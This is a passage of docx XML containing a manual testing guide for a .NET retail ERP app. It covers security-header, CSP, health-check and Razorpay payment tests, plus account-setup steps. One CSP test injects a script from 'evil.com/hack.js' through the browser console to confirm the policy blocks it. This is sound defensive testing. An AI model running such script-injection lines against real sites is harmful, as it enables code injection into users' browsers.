        <w:t xml:space="preserve">   3. You should see a file like: retailerp-20260306.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Open the file — it should contain structured log entries with timestamps, user names, and request info.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if log file exists and contains entries  |  ❌ FAIL if folder/file is empty or missing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Health Check Endpoint (/health)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm /health returns JSON with database connectivity status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 4-A: Health Check While DB is Running</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Start the app: dotnet run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Open browser → https://localhost:{port}/health</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. You should see: Healthy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. This means SQL Server (LocalDB) is connected and responding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if page shows "Healthy"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 4-B: Health Check via PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   Run: Invoke-WebRequest -Uri "https://localhost:PORT/health" -SkipCertificateCheck | Select-Object StatusCode, Content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   Expected: StatusCode=200, Content="Healthy"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 4-C: Health Check Without Login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Open a private/incognito browser window (not logged in).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Navigate to https://localhost:{port}/health</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. It should still show 'Healthy' — this endpoint is [AllowAnonymous].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. ✅ PASS if accessible without login  |  ❌ FAIL if redirected to login page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Content Security Policy &amp; Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm all security headers are present in HTTP responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-A: Check Headers in DevTools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Open any page in the app (e.g., Dashboard).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Open DevTools → Network tab → click on the page request (first one, type 'document').</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Go to Response Headers section. Verify ALL of these are present:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4.    • X-Content-Type-Options: nosniff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5.    • X-Frame-Options: DENY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6.    • Referrer-Policy: strict-origin-when-cross-origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   7.    • Permissions-Policy: camera=(), microphone=(), geolocation=()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   8.    • X-XSS-Protection: 1; mode=block</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   9.    • Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   10. ✅ PASS if ALL 6 headers are present  |  ❌ FAIL if any are missing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-B: PowerShell Header Check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   Run (replace PORT):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   $r = Invoke-WebRequest -Uri "https://localhost:PORT/" -SkipCertificateCheck -UseBasicParsing</w:t>
        <w:br/>
        <w:t xml:space="preserve">   $r.Headers["X-Content-Type-Options"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">   $r.Headers["X-Frame-Options"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">   $r.Headers["Content-Security-Policy"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">   $r.Headers["Permissions-Policy"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   Each should return the expected value (not empty/null).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-C: CSP Blocks Unauthorized Scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. On any page, open DevTools → Console.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Paste: let s=document.createElement('script');s.src='https://evil.com/hack.js';document.head.appendChild(s)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Check the Console — you should see a CSP violation error like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4.    'Refused to load the script because it violates the Content Security Policy'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if the script is blocked  |  ❌ FAIL if it loads without error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sprint 1 — Testing Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Print this page, test each item, and mark Pass/Fail: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Test ID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Expected Result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1-A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Login Rate Limit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6th login attempt within 1 min → 429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1-B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 Rate Limit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65 rapid POS requests → last 5 get 429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1-C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PowerShell Rate Test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6th+ request in 1 min → 429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2-A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 Normal Flow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Add item, payment, complete bill work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2-B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CSRF Token Present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XSRF-TOKEN cookie + X-XSRF-TOKEN header visible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2-C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CSRF Token Required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Request without token → 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Console Logging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Structured Serilog lines in terminal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File Logging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Logs/retailerp-*.log file exists with entries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Health Check OK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/health returns 'Healthy'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Health via PowerShell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StatusCode=200, Content='Healthy'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Health No Auth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/health accessible without login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Security Headers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6 headers present in DevTools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Headers via PowerShell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headers return correct values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CSP Blocks Scripts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External script injection blocked by CSP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</w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>RetailERP — Business Account Setup Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Before starting Sprint 2 and beyond, create ONE professional Google/Gmail business account. This account will be the central hub for all API keys, service dashboards, and credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Why a Dedicated Business Account?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Separation of Concerns — Personal emails stay clean; all RetailERP notifications, API alerts, and billing go to one place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• API Key Management — Razorpay, WhatsApp Business API, Google OAuth, Firebase, Twilio SMS — all registered under ONE account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Professional Emails — Customers receive receipts from 'noreply@retailerp.in' instead of a personal Gmail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Team Handoff — If you ever hire developers or sell the product, you hand over ONE account with everything.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Google Cloud Console — Free $300 credit for hosting, Cloud SQL, Firebase, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step: Create the Account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Choose Email Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Suggested format (pick one):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   • retailerp.app@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   • retailerp.official@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   • retailerp.dev@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   • retailerp.system@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   • admin.retailerp@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Tip: Check availability at gmail.com → 'Create account'. Choose 'For work or my business' (it's free — this is regular Gmail, not Google Workspace).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 — Create Gmail Account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Go to https://accounts.google.com/signup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Click "Create account" → select "For work or my business"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. First name: RetailERP | Last name: Admin (or your name)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Choose your email address from the suggested names above</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. Set a STRONG password (16+ chars, mix of letters/numbers/symbols) — save it in a password manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. Add your personal phone for recovery (you can remove it later)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   7. Complete the setup wizard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 — Enable 2-Step Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Go to https://myaccount.google.com/security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Under "Signing in to Google" → click "2-Step Verification" → turn it ON</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Add your phone number for SMS codes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. This is MANDATORY — API providers like Razorpay require it for security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4 — Generate App Password for SMTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. After enabling 2-Step Verification, go to: https://myaccount.google.com/apppasswords</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. App name: "RetailERP SMTP"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Click Generate → copy the 16-character password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Update your RetailERP appsettings.json or User Secrets with this password:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5.    "Smtp": { "User": "retailerp.app@gmail.com", "Password": "xxxx xxxx xxxx xxxx" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. This replaces the current devupadhyay480@gmail.com SMTP config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5 — Register on Key Platforms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Use the new email to register on ALL these platforms (you'll need them in upcoming sprints):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URL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Needed For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Razorpay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https://dashboard.razorpay.com/signup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Sprint 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UPI/Card payments. Sign up → get Test API Key + Secret. Real keys need business KYC.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Google Cloud Console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https://console.cloud.google.com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Sprint 5+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OAuth 2.0, Firebase, Cloud hosting. Free $300 credit for 90 days.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Firebase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https://console.firebase.google.com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Sprint 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Push notifications, real-time DB for offline sync. Free tier is generous.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Twilio (SMS)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https://www.twilio.com/try-twilio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SMS alerts/OTP. Free trial gives $15 credit (~500 SMS in India).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WhatsApp Business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https://business.facebook.com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WhatsApp receipts. Requires Meta Business account. Apply early — approval takes time.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https://github.com/signup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Sprint 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Code hosting, CI/CD with GitHub Actions. Create a 'RetailERP' private repo.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Cloudflare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https://dash.cloudflare.com/sign-up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Deployment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 DNS, SSL, CDN, DDoS protection. Essential for production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 6 — Store Secrets Securely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>NEVER put API keys in appsettings.json (it gets committed to Git). Use .NET User Secrets:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   dotnet user-secrets init   (already done — your project has UserSecretsId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   dotnet user-secrets set "Smtp:Password" "xxxx xxxx xxxx xxxx"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   dotnet user-secrets set "Razorpay:KeyId" "rzp_test_xxxxxx"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   dotnet user-secrets set "Razorpay:KeySecret" "xxxxxxxxxxxxxxxx"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>User Secrets are stored at: %APPDATA%\Microsoft\UserSecrets\aspnet-RetailERP-135dda41-...\secrets.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>They are NEVER committed to Git and only available on YOUR machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Account Setup Checklist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Gmail Account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new business Gmail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☐ Done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2-Step Verification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Enabled on Google Account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☐ Done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 Password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Generated for SMTP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☐ Done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SMTP Updated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appsettings or User Secrets updated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☐ Done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Razorpay Signup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 mode API keys obtained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☐ Done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Google Cloud Console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Account created, project initiated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☐ Done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Repo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Private RetailERP repo created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☐ Done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2 — Testing Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Use this section to manually verify every Sprint 2 feature. You need a Razorpay TEST mode account with test keys configured in User Secrets. Run the app with: dotnet run --launch-profile https   (from C:\7th_Semester\RetailERP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Online Payment via Razorpay Checkout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Complete an online payment on a POS bill using the Razorpay test gateway.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-1A: Create Bill and Pay Online</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Log in as Admin or Cashier → POS → New Bill (pick any store/warehouse).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Scan/add an item to the bill (e.g., any item with a price).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Click the "Pay Online (UPI / Card / NetBanking)" button (blue button below the payment form).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Razorpay Checkout popup should appear with the bill amount.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. Select "Card" and use test card: 4111 1111 1111 1111, Expiry: any future date, CVV: any 3 digits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. Complete payment → popup closes → page should reload with payment recorded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   7. ✅ PASS if payment appears in the bill's payment list with shield icon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-1B: UPI Test Payment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Create another bill with an item.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Click "Pay Online" → in Razorpay popup, select "UPI".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Enter test UPI ID: success@razorpay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Complete the payment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if payment recorded with method "UPI" and VPA shown in reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-1C: Payment Exceeds Remaining Amount</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. On a bill that is already fully paid, click "Pay Online".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. The system should show an error: "No amount due" (not open Razorpay popup).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. ✅ PASS if error message shown  |  ❌ FAIL if Razorpay popup opens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Payment Signature Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm server-side HMAC-SHA256 signature verification works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-2A: Valid Payment Records Correctly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. After completing Test 2-1A, check the bill page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Payment should show: method (Card/UPI), amount, reference with Razorpay Payment ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Open DevTools → Console → check there are no errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Check Serilog logs: Logs/retailerp-*.log should show 'Razorpay: Signature verified' entry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if payment recorded AND log shows signature verified</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-2B: Tampered Signature Rejected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Open DevTools → Console on the POS Bill page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. After CreateOrder succeeds, before VerifyPayment is called, manually call VerifyPayment with a fake signature:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3.    fetch("/PaymentGateway/VerifyPayment", {method:"POST", headers:{"Content-Type":"application/json","X-XSRF-TOKEN":document.cookie.match(/XSRF-TOKEN=([^;]+)/)?.[1]||""}, body:JSON.stringify({billId:"...",orderId:"...",paymentId:"...",signature:"fake123",amountPaise:100})}).then(r=&gt;r.json()).then(console.log)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Response should show: { success: false, message: "Payment verification failed. Signature mismatch." }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if tampered signature is rejected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Receipt Shows Gateway Payment Badge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Verify receipt view distinguishes online payments from cash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-3A: Gateway Payment on Receipt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Complete a bill that has at least one online (Razorpay) payment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. View the receipt (click View Receipt or navigate to /Pos/Receipt/{billId}).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Online payments should show a shield-check icon (✓) next to them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Payment method should display as 'UPI', 'Card', 'NetBanking', or 'Wallet'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. Reference should include the Razorpay Payment ID or UPI VPA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. ✅ PASS if shield icon + method + reference visible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Razorpay Refund (Admin/Manager Only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Verify refund endpoint works and is restricted to Admin/Manager roles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-4A: Refund as Admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Log in as Admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. This test requires calling the Refund API directly (no UI button yet).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Use DevTools Console or Postman to POST to /PaymentGateway/Refund with the PaymentId of an online payment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Response should show: { success: true, refundId: "rfnd_...", amount: X.XX }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. Check Razorpay Dashboard (https://dashboard.razorpay.com) → Transactions → the payment should show "Refunded".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. ✅ PASS if refund succeeds and shows in Razorpay Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sprint 2 — Testing Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Print this page, test each item, and mark Pass/Fail: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Test ID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Expected Result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2-1A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Card Payment Flow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Razorpay popup → test card → payment recorded with shield icon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2-1B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UPI Payment Flow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success@razorpay UPI → payment recorded with UPI method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2-1C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Overpayment Blocked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Fully paid bill → 'No amount due'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2-2A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Signature Verified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Payment recorded + 'Signature verified' in logs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2-2B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Tampered Sig Rejected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Fake signature → 'Signature mismatch'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2-3A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Receipt Badge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Shield icon + method + reference on receipt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2-4A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Refund as Admin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Refund API returns success + shows in Razorpay Dashboard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3 — Testing Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Use this section to manually verify every Sprint 3 feature. Run the app with: dotnet run   (from C:\7th_Semester\RetailERP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Dashboard Loads with Default Widgets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm dashboard loads with Gridstack grid and default widgets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-1A: First Login Default Layout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Log in as Admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Dashboard should load with a Gridstack grid containing KPI cards, charts, and tables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Default layout: 4 KPI cards on top row, then charts, then tables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Each widget should show a loading spinner, then populate with data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if widgets appear and populate with data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Lock / Unlock Toggle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm lock prevents editing and unlock enables it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-2A: Locked State (Default)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. On the dashboard, observe the toolbar — lock button should show red lock icon with 'Unlock' text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Try to drag a widget by its header — it should NOT move.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Try to resize a widget from the corner — it should NOT resize.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. The 'Add Widget' and 'Reset Layout' buttons should be hidden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. The 'X' (remove) button on individual widgets should be hidden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   6. ✅ PASS if all editing is disabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-2B: Unlocked State</w:t>
